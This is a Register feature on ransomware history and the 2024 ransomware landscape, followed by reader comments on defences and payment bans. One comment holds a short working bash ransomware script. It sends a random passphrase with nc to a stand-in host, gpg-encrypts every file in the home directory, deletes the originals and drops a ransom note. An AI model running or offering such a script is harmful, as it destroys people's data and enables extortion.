News: 1735039867

  ARM Give a man a fire and he's warm for a day, but set fire to him and he's warm for the rest of his life (Terry Pratchett, Jingo)

What do ransomware and Jesus have in common? A birth month and an unwillingness to die

(2024/12/24)


Feature Your Christmas holidays looked quite different in the '80s to how they do today. While some will remember what it was like to wake up on the 25th back then, some of you won't even have been born. The food hasn't changed much. Turkey, stuffing, Brussels sprouts… that's all been around for some time.

Yet what some call the good old days, others might describe as the dark ages of IT. Unrecognizable times. The more mature sector of our readership will remember Christmas Day without smartphones, online multiplayer games, and even consumer-grade internet. Their offices were just starting to get internal networks set up and their computers rarely had hard drives. Too expensive. This was the age of the floppy disk.

It was also the age of opportunity for cybercriminals. Forget about so-called "cyber hygiene," the word "cybersecurity" wouldn't make it into even the most niche lexicons for years to come. For all intents and purposes, there were no cybercriminals yet. However, what did exist was a chance for true visionaries in the game to capitalize on what we would now call technological illiteracy for monetary gain.

[1]

In December 1989, three years after the [2]Alvi brothers cooked up the world's first PC virus, Brain, and one year after the world's first internet virus, the Morris Worm, was written and unleashed, we saw what experts now call the first case of commercial ransomware. The AIDS trojan was the brainchild of Harvard-educated Joseph Popp. It wasn't just innovation, it was invention.

[3]

[4]

This December, we at Vulture Central observe the 35th anniversary of the AIDS trojan and the major milestones in ransomware since. No traces of the world's first ransomware will be found anywhere near the payloads of RansomHub, Qilin et al, but Popp will forever be remembered as the grandfather of one of the most compelling forms of crime.

AIDS trojan recap

Dr Popp, originally from Ohio, was an evolutionary biologist and researcher whose work, much of which was carried out in Kenya, was focused on the AIDS illness. Awareness of the condition only started to peak in the mid-to-late Eighties, around the time the trojan was distributed in December 1989.

Over the years that followed, numerous AIDS trojans infected PCs via floppy disks sent in the mail. Popp was identified as the author and person responsible for manually posting around 26,000 of the disks from a South Kensington address.

It's believed he chose London as a mailing base since it didn't have computer fraud laws in place at the time, a reality that soon changed with the Computer Misuse Act 1990. He also used stolen mailing lists for PC Business World magazine subscribers and WHO members to gather the victims' details.

[5]

It's common knowledge now that receiving any kind of unknown digital storage device in the mail or through other means should certainly not be seen as an invitation to plug it in and see what it does, but back in 1989, this would not have crossed the minds of anyone other than a small portion of the population. Popp was truly ahead of his time.

Bear in mind, too, that the [6]Morris Worm – widely considered to be the first computer virus ever – was unleashed a year earlier. For Popp to establish the cybercriminal business model that would continue to stump the finest minds in 2024 this early into IT history illustrates how rarefied his thinking was.

Once installed, the trojan would wait for the infected host to reboot 90 times before displaying what we now call a ransom note in the form of a service license agreement. It instructed victims to send either $189 or $378, depending on whether they'd like to access their PC for a year or a lifetime, to a Panamanian PO box. Purportedly, the money was to be collected by "PC Cyborg Corporation" and used to fund AIDS research.

[7]

No one is believed to have ever paid the demands, which of course pale to modern-day equivalents, but it is widely considered the first case of ransomware. There's also a case to be made that it was the first high-profile example of hacktivism too – a term that wouldn't be coined until the mid-Nineties.

A breakdown of the trojan was carried out over hundreds of hours and published by Jim Bates, a member of the Institution of Analysts and Programmers, in the [8]January 1990 edition of trade mag Virus Bulletin. He found that there was no actual encryption going on – the trojan just changed file names.

Popp was arrested at Schiphol Airport for distributing the trojan but avoided prison after being declared mentally unfit to stand trial. He was sent back to the US and died in 2006.

Taken too soon

It's a shame Popp died when he did, not just because he was taken at the age of 55, but also because he didn't live long enough to see his illicit invention reach the height of its powers.

Not only do we observe the 35th anniversary of the AIDS trojan, but the vultures also acknowledge the anniversary of Gpcode – the first true example of commercial ransomware as we know it today.

The first samples of Gpcode were detected in December 2004, 20 years ago in Russia, but it wasn't until 2006, the year in which Popp died, that the payload garnered widespread attention.

Kaspersky's 2006 [9]paper was the first to shine a light on Gpcode – the first trojan to encrypt various file types before dropping an email-based [10]ransom note [PDF] demanding sums of $100 to $200, payable via e-gold or Liberty Reserve accounts. The security shop noted it had been harassing Russians for well over a year by this point.

In some very early cases, there were signs that the person behind Gpcode would only demand around 1,000 rubles for decryption (now worth around $9 but roughly $35 at the time), and was known to be talked down to just half that.

The earliest versions of Gpcode used 56-bit RSA encryption but the author, whose [11]identity is known but hasn't been publicly revealed, honed their encryption knowledge and two years later opted for more secure encryption schemas that used 1,024-bit keys.

As Cisco Talos's EMEA lead Martin Lee notes: "I think we can probably surmise that this was successful for the individuals behind it, and it seems to have spawned or at least inspired the creation of a ransomware industry behind it."

On a call with The Register , Lee reminds this reporter, whose family didn't own any kind of computer let alone an internet connection when these events transpired, that at this time offices were only starting to receive wide-scale rollouts of Ethernet connections. The global cybersecurity community was still very small too.

His comments not only serve as a reminder of how immature technology was at the time compared to modern standards but also of the reason why ransomware was starting to become potentially more profitable.

Cybercriminals now had the means to reach victims en masse thanks to the internet combined with cyber hygiene levels that were still fairly poor. No more mailing floppies for these guys. But it wasn't until the advent of Bitcoin and other cryptocurrencies in 2008 that ransomware would have the final piece of the puzzle locked down – a reliable means to secure payments. And the rest, as they say, is history.

The year in review

History lesson over, let's take a look at Popp's legacy in 2024.

You probably don't need me to tell you that things in ransomware are truly bleak. We're 35 years into understanding the business's workings and seemingly no closer to agreeing on how to stop it. The industry can't even reach a consensus on the best way to approach it, let alone how to actually deliver that vision. It leaves us here at the Manchester bureau of Vulture Towers looking back on how the past year has been as devastating as they come, across our land and beyond our seas.

Close to The Register 's London HQ, we've recently seen ransomware at its very worst with the INC Ransom gang targeting [12]Alder Hey Children's Hospital , the latest of four major hits on the NHS this year, and the second inflicted by the same hands.

[13]Krispy Kreme Doughnut Corporation admits to hole in security

[14]Heart surgery device maker's security bypassed, data encrypted and stolen

[15]Blue Yonder ransomware termites claim credit

[16]Ransomware hangover, Putin grudge blamed for vodka maker's bankruptcy

Across England's river Mersey and just days before the attack on Alder Hey, three centers under [17]Wirral University Teaching Hospitals' remit were hit by separate ransomware crooks who still haven't revealed themselves, while INC struck [18]NHS Dumfries and Galloway up in Scotland earlier this year. Plus, the impact of Qilin's attack on pathology services company [19]Synnovis is still felt in some of London's hospitals today.

Elsewhere in healthcare, UnitedHealth's ALPHV/BlackCat attack ended up costing the company [20]well in excess of $2 billion , its financials revealed recently, making it one of the costliest attacks in history.

Two children's hospitals in Chicago were hit at the start of the year – LockBit boasted of its attack on [21]Saint Anthony Hospital , while those behind the attack on [22]Lurie Children's Hospital days later were too chicken to own up to what they did.

We've almost certainly missed some other biggies from this list, but these were the most morally reprehensible ones, to us at least.

Green shoots emerge but skies remain dark

It's not all bad news, though, as both ALPHV and LockBit, two of the biggest names in the game, were shuttered this year. Sure, [23]other groups have picked up the slack, but the cops' disruption of LockBit was especially momentous.

Not only did they bring down and comprehensively annihilate the brand's reputation, but they unmasked the man behind the whole operation. It felt like a big moment from the outside looking in, but for those in charge of bringing down Dmitry Khoroshev, the man suspected of being the gang's ringleader, it must have been a career highlight.

Operation Endgame would go on to provide the blueprint for future law enforcement disruptions. Operation Cronos, Operation Magnus and others all emulated the same humiliation tactics to varying degrees. It's an approach we're told cops will continue to use in lieu of making key arrests.

Although an impressive number of arrests were made this year, including those of [24]Scattered Spider members and [25]LockBit lynchpins , there are no signs of disrupting the business model to the extent that we start seeing a fall in attacks.

National cybersecurity agencies such as CISA and the UK's NCSC have spent the past year promoting the old idea of implementing secure-by-design (SBD) principles in software. The idea is to reduce the number of vulnerabilities in products before they're shipped, although history has taught us that this is easier said than done.

We reported from CYBERUK earlier this year that the NCSC believes the industry also needs to introduce market incentives for vendors to make secure products from the outset.

The agency's CTO, Ollie Whitehouse, said at the time: "We do not have a technology challenge. We know how to build cybersecurity-resilient technology. We have a fundamental market challenge to do so. So, how we incentivize that market to do it will be on us all in the next period if we want to ultimately win."

Cisco Talos's Lee offers us a different perspective, one that's shared by many corners of the industry on this divisive idea. He acknowledges the difficulty in implementing industry-wide SBD, suggesting that simply getting the basics right: deploying endpoint detection and response everywhere, gaining valuable visibility, and ensuring systems are properly configured is enough to stop most breaches in the current environment. Maintaining backups is key too, of course.

"In an ideal world, yes, systems should just be secure. However, software engineering is hard," he says.

"It's difficult enough to create software that does what it is supposed to do and fulfills its requirements. For something to be secure, not only does it need to do what it's supposed to do, but never do anything else.

"Nobody wants to write vulnerabilities. No one goes out in the morning and thinks, yeah, do you know what? I'm going to code a really big software vulnerability today. Nobody does that. But these things creep in simply because software engineering is hard."

So some experts believe it's not feasible to stamp out vulnerabilities at source and we can't arrest many of the major players due to absent extradition agreements with hostile states. The other main approach to stopping ransomware for good is the most controversial of all – banning payments – but, again, the experts can't agree on that either.

Since the vultures examined the [26]arguments around [27]banning payments last Christmas, the industry remains at a crossroads on the matter with little material progress to show for the year. Will 2025 be when things change for the better? Probably not. But for now, just ensure your backups are updated before Jesus' birthday and hope nothing goes wrong over the holidays before you go back to taking up defensive positions again next year. ®

Get our [28]Tech Resources



[1] https://pubads.g.doubleclick.net/gampad/jump?co=1&iu=/6978/reg_security/cybercrime&sz=300x50%7C300x100%7C300x250%7C300x251%7C300x252%7C300x600%7C300x601&tile=2&c=2Z26eWzK4FuHbq-6fef4XKAAAAMM&t=ct%3Dns%26unitnum%3D2%26raptor%3Dcondor%26pos%3Dtop%26test%3D0

[2] https://www.theregister.com/2014/06/03/security_overview/

[3] https://pubads.g.doubleclick.net/gampad/jump?co=1&iu=/6978/reg_security/cybercrime&sz=300x50%7C300x100%7C300x250%7C300x251%7C300x252%7C300x600%7C300x601&tile=4&c=44Z26eWzK4FuHbq-6fef4XKAAAAMM&t=ct%3Dns%26unitnum%3D4%26raptor%3Dfalcon%26pos%3Dmid%26test%3D0

[4] https://pubads.g.doubleclick.net/gampad/jump?co=1&iu=/6978/reg_security/cybercrime&sz=300x50%7C300x100%7C300x250%7C300x251%7C300x252%7C300x600%7C300x601&tile=3&c=33Z26eWzK4FuHbq-6fef4XKAAAAMM&t=ct%3Dns%26unitnum%3D3%26raptor%3Deagle%26pos%3Dmid%26test%3D0

[5] https://pubads.g.doubleclick.net/gampad/jump?co=1&iu=/6978/reg_security/cybercrime&sz=300x50%7C300x100%7C300x250%7C300x251%7C300x252%7C300x600%7C300x601&tile=4&c=44Z26eWzK4FuHbq-6fef4XKAAAAMM&t=ct%3Dns%26unitnum%3D4%26raptor%3Dfalcon%26pos%3Dmid%26test%3D0

[6] https://www.theregister.com/2013/11/04/morris_worm_anniversary/

[7] https://pubads.g.doubleclick.net/gampad/jump?co=1&iu=/6978/reg_security/cybercrime&sz=300x50%7C300x100%7C300x250%7C300x251%7C300x252%7C300x600%7C300x601&tile=3&c=33Z26eWzK4FuHbq-6fef4XKAAAAMM&t=ct%3Dns%26unitnum%3D3%26raptor%3Deagle%26pos%3Dmid%26test%3D0

[8] https://www.virusbulletin.com/uploads/pdf/magazine/1990/199001.pdf

[9] https://securelist.com/blackmailer-the-story-of-gpcode/36089/

[10] https://rump2008.cr.yp.to/6b53f0dad2c752ac2fd7cb80e8714a90.pdf

[11] https://www.theregister.com/2008/10/01/gpcode_author_hunt/

[12] https://www.theregister.com/2024/11/29/inc_ransom_alder_hey_childrens_hospital/

[13] https://www.theregister.com/2024/12/11/krispy_kreme_cybercrime/

[14] https://www.theregister.com/2024/12/10/artivion_security_incident/

[15] https://www.theregister.com/2024/12/09/security_in_brief/

[16] https://www.theregister.com/2024/12/05/putin_ransomware_stoli_group/

[17] https://www.theregister.com/2024/12/05/hospital_cyberattack/

[18] https://www.theregister.com/2024/06/18/nhs_dumfries_and_galloway_letter/

[19] https://www.theregister.com/2024/06/20/qilin_our_plan_was_to/

[20] https://www.theregister.com/2024/11/20/change_healthcares_clearinghouse_services/

[21] https://www.theregister.com/2024/02/01/lockbit_ransomware_attack_hospital/

[22] https://www.theregister.com/2024/02/05/lurie_childrens_hospital_cyberattack/

[23] https://www.theregister.com/2024/08/30/ransomhub/

[24] https://www.theregister.com/2024/06/17/scattered_spider_arrest/

[25] https://www.theregister.com/2024/10/01/euro_cops_arrest_four_mystery/

[26] https://www.theregister.com/2024/01/04/feds_stole_the_ransomware_limelight/

[27] https://www.theregister.com/2024/01/06/ransomware_payment_ban_wrong_idea/

[28] https://whitepapers.theregister.com/



You know the solution

druck

As the article mentions ransomware only really took off with the advent of payment by cryptocurrency, remove to that from the equation and 99.99% of the criminal enterprise will disappear over night. I'm sure someone will still attempt to get paid by a suitcase of cash under a bridge, or a Western union transfer, but the chances of many payments reaching remote criminals sitting pretty in sanctioned countries without extradition are infeasibly small.

Re: You know the solution

DS999

And you don't even have to outlaw cryptocurrency. Just make it illegal to use for criminal enterprise or anything related to it, which would immediately make it illegal to use crypto to pay ransom (or to buy illegal drugs etc.)

Before anyone laughs at the idea of making using something in a crime illegal, that's already been done many times where e.g. possession of a gun isn't illegal but is if you are carrying one when committing a felony it upgrades the charges. Or Al Capone getting put in Alcatraz not for all his criming, but for failing to pay taxes on the money he made from criming.

It would be interesting to see how far the bitcoin price would fall if laws against paying ransom were made and enforced in the US & EU.

John Riddoch

Part of the problem with Ransomware is how to stop it. At its heart, it's editing files a user can access and most users can access a lot of files as part of their work (or home systems). All you have to do is get the victim to run something which proves annoyingly easy, despite the cyber security training most of us are subjected to. You can't remove a user's access to files without stopping them doing their job, so what do you do? If that problem can be solved, ransomware becomes less of a threat.

Paul Crawford

All you have to do is get the victim to run something which proves annoyingly easy

An therein line the main (technical) problem. User access control in the classical system was about stopping a user screwing with other user's files, not their own on the assumption that nobody is that dumb but malice is a risk. Alas...

You can remove local execute permissions on file systems to make it much harder, but these days with web browsers able to run arbitrary code from outside it is only part of the way there, not to mention the ever-dumb aspect of email attachments being able to run code (e.g. Adobe PDF doing far, far, more than just print-ready formatting)..

At its heart, it's editing files a user can access...

Bitsminer

Which may be the heart of the problem.

Filesystems have not changed much in the last, oh, 50 years. Create a file, append to it, delete it. As long as you have the "authority", that is you are the owner, you have no "accountability", proof that your intentions (or the hacker imposter's intentions) were good.

Change the filesystems to something more database like ("rollback transaction") or git-like ("reset HEAD^") then much hackery is foiled. Not all perhaps, but lots.

Then "encrypt all files" becomes, whether hacker likes it or not, "encrypt all current files", and a rollback undoes this.

Yes, yes, yes, I can hear the architects muttering about control planes and security rings and defending this imaginary new filesystem itself. In truth, firewalls and security features already stop 99.9% of attacks, it's the 0.1% that make the headlines. More security features like trustworthy and reversible filesystems might make that 0.0001%.

Re: At its heart, it's editing files a user can access...

Blazde

Downvoted because I disagree this is anything like a core solution but it's still an intriguing line of thinking.

Filesystems that somehow, at the hardware level, never delete anything would be a privacy nightmare. They would also fill up with junk very rapidly - although storage is impressively cheap so that's becoming less of an obstacle. Finer-grained permissions around deleting data, append-only backups, snapshots and so on, all these technologies exist already but they're hassle to set up and maintain, and they're susceptible to vulnerabilities like any other software, and susceptible to misconfiguration and user mistake like any other permission system. So they can only ever be one of many lines of defence that realistically only the richest most security-conscious organisations use effectively. Most organisations are not rich of course. They cut corners where ever possible, the market incentivises that. It's the entire basis of our modern economy. It's very difficult to see how that changes dramatically, with either altered market incentives or state-enforced legislation.

Historically societies stop crime effectively by disincentivising crime itself, not by expecting all non-criminals to do more than the minimum to constantly defend themselves against kidnappers and thieves and so on. It would be too expensive if I had to defend my home, car, person, and family from free-roaming armed gangs. Of course I make some efforts to secure my possessions, but even in countries where law enforcement has completely broken down there is a limit to what can be done.

So I'm not sure the current situation will change very much until the pariah countries that tolerate and/or fund cyber-criminals are brought into the global fold, or cut-off from the internet and digital currencies, or something. Obviously that's not happening soon. Until then baby steps to increase security, going after the crims to whatever extent possible are still positive, but not anything approaching a solution.

Re: At its heart, it's editing files a user can access...

Richard 12

There are already several filesystems that don't delete, instead they copy-on-write. To limit the size "old" versions are eventually deleted.

These make spotting ransomware trivial - the size-on-disk suddenly dramatically increases as large widespread changes (the encryption) occurs, and thus it's incredibly simple to detect and "pull the plug" before anything is actually lost.

On top of that, it's simpler to fix as you can just roll back to a previous state. Good data created during the attack itself may still be lost, but it's better than most backup strategies alone.

Obviously this won't help at all if the attacker gets root as they can abuse the ability to prune and restore, so it's not a panacea.

Re: At its heart, it's editing files a user can access...

Paul Crawford

Having a backup is a major step forward, but the issue here is most people are also the administrator so if they can be tricked into running software it can remove an on-device backup (such as file system snapshots a la ZFS).

You need immutable backups, and on different media so lost/damaged machine is not a loss of data. That means a different management interface/credentials and a 2nd device which costs in money, time, and business process. Few care until after they are screwed...

You can't stop it

DS999

Trying to fix it through "more security" isn't going to work any better than fixing the problem of illegal drugs has with "more cops".

You have to make it illegal to pay ransom, and illegal to offer ransomware insurance. Will that create some initial pain, yes. But that pain would have been a lot smaller if it had been done when I started advocating for this 6 or 7 years ago. And that pain will be a lot higher if we wait 6 or 7 more years before we finally give up the stupidity of trying to secure our way out of it and bite the bullet.

Re: You can't stop it

Richard 12

Weeelll, ransomware insurance itself is fine.

Insurance to cover the cost of re-securing and recovery afterwards is a reasonable concept - if only because coverage will certainly require a documented backup and disaster recovery plan. It shouldn't be commercially viable, but that's up to the businesses to price.

It's the "paying a ransom" part that needs to be illegal - and involve personal consequences for authorisation. So if the insurer pays the ransom, the insurance manager or CEO authorising it goes to prison. Same as the other corruption laws around paying bribes.

ComicalEngineer

One of the problems is that software has become too complicated and thus there are too many vulnerabilities at so many levels within the code. IMHO one of the main objectives of software writers should be to build security into the code, of course that doesn't make any money and new features are what seems to sell software.

The other issue, of course, is dumb users who will download infected files. One of my old companies had this happen where a member of the accounts department downloaded an "invoice" from an unknown source - the sender wasn't even on the supplier list and the attachment was an .exe file - and promptly infected all of the accounts department (about 30 PCs) with a trojan. fortunately we had our own IT team at the time and they caught it quickly having picked up a spike in network traffic. Nonetheless it stopped all accounts transactions for over a week.

Ransomware is a problem inherit to proprietary OS's

GNU Enjoyer

Those are the only OS's insecure enough for ransomware to be effective - if you run a free OS instead, don't run proprietary malware (including remote arbitrary code execution via JS in a web browser) and keep internet-accessing software updated, suddenly you are pretty much immune to anything but a directly targeted attack by a skilled cracker.

Yes, if you keep running windows, it's only a question of time before you get hit by ransomware.

The solution is to install GNU/Linux today.

Ransomware is not particularly hard to write either, as below is one example of GNU/Linux ransomware I found, but due to its basic security design, all that can do is encrypt files in the users $HOME directory and even then this script is totally harmless in the filesystem of a competent GNU user, as the software does not get executed unless the user chooses to set the executable bit and then execute it (and of course any user who knows anything about GNU bash and gnupg will not execute the below script);

#!/bin/bash

# Copyright © 2024 翠星石

# This program is free software: you can redistribute it and/or modify

# it under the terms of the GNU Affero General Public License as published by

# the Free Software Foundation, either version 3 of the License, or

# (at your option) any later version.

#

# This program is distributed in the hope that it will be useful,

# but WITHOUT ANY WARRANTY; without even the implied warranty of

# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the

# GNU Affero General Public License for more details.

#

# You should have received a copy of the GNU Affero General Public License

# along with this program. If not, see .

RANDOM_PASSWORD="$RANDOM$RANDOM$RANDOM$RANDOM$RANDOM$RANDOM$RANDOM"

ID="$RANDOM$RANDOM"

echo $ID:$RANDOM_PASSWORD | nc not-ransomware-server.biz 6969

find "$HOME" -type f -exec gpg --symmetric --batch --passphrase $RANDOM_PASSWORD {} \;

find "$HOME" -type f -not -name '*.gpg' -exec rm {} \;

echo "All your files have been encrypted, make a breadstick payment to and quote ID: $ID to receive a decryption password." > "$HOME"/README-encrypted.txt

Re: Ransomware is a problem inherit to proprietary OS's

Bebu sa Ware

I suspect the result of bash evaluating "$RANDOM$RANDOM$RANDOM$RANDOM$RANDOM$RANDOM$RANDOM" won't be all that more random than $RANDOM .

sitta_europea

Quoting the article:

"... It's a shame Popp died when he did..."

On the contrary, I'd have said that it's a shame he didn't die sixteen years earlier.

What do ransomware and Jesus have in common?

Mentat74

They are both being used to steal people's money...

Simple solution

Anonymous Coward

Disk is very cheap, it just needs firmware that only writes new files. Save an existing file and it just creates a new one or a diff, leaving the existing file in place. Encrypting a file creates a new file and doesn't alter the existing data. Nothing on the disk can be written to more than once. Basically a WORM drive. Sensitive data will need to be treated separately and the cost of securing that data is offset by the reduction in quantity as most data isn't that sensitive.

Rogues or Heroes, Renegades or Saviours, Saints or Sinners ?

amanfromMars 1

Or just a Another Glitch in the Force to be Fixed?

Cybercriminals now [ie 20 odd years ago] had the means to reach victims en masse thanks to the internet combined with cyber hygiene levels that were still fairly poor. ..... Connor Jones/El Reg

After the passing of more than two decades of experience and opportunity, Connor, have lessons been learned and are effective practices deployed for all to enjoy greater virtual security and improved cyber hygiene levels, or are things still fairly poor ..... and even a great deal worse than earlier with many more instances of critical vulnerabilities in vital systems and utilities being ably exploited by increasing levels of sophisticated 0day and Disruptive Anonymous Trojan Attack which then itself opens up further opportunities enabling greater advancing developments in future alien leading fields of both practical human and remote virtual metadataphysical endeavour?

Re: Rogues or Heroes, Renegades or Saviours, Saints or Sinners and Superunnatural Reckonings

amanfromMars 1

And for those able to reply truthfully and not be fooling themselves into the cold comfort of a psychotic state of delusional denial are the answers to those questions ...... No, No, Yes and Yes with the final Yes launching a multitude of further truthful inconvenient and uncomfortable answers questioning the future suitability of human leadership in constantly failing exclusive elite executive administrative systems should such leadership deny they are responsible and accountable for what is an expanding catastrophic problem of their own making in dire straits need of third party fixing seeds and feeds.

have lessons been learned? ...... No

are effective practices deployed? .... No

are things still fairly poor? ....Yes

and even a great deal worse than earlier with many more instances of critical vulnerabilities in vital systems and utilities being ably exploited by increasing levels of sophisticated 0day and Disruptive Anonymous Trojan Attack which then itself opens up further opportunities enabling greater advancing developments in future alien leading fields of both practical human and remote virtual metadataphysical endeavour? .... Yes

if u get dun for ransomeware ur crap!

harrys

nicely written article :)

either....

1) ur not that good at ur job

2) u have not been given adequate resources/time to do ur job - begging the question.... why are u still there?

3) ur boss when told of the remedy, understands, but doesnt give a shite because he's a tight arseole - again begging the question, what are u doing there?

bottom line .... u dont try to prevent ransomeware, fools errand, u put in systems/procedures (and some training) into minimizing downtime and disruption when it happens ... AND ITS GOING TO COST A LOT... mainly in storage/software

the more money u throw at it the lower the disruption period!

its one of the few problems that can actually be fixed by throwing enough money at it.... a very rare thing indeed :)

OKAY!! Turn on the sound ONLY for TRYNEL CARPETING, FULLY-EQUIPPED
R.V.'S and FLOATATION SYSTEMS!!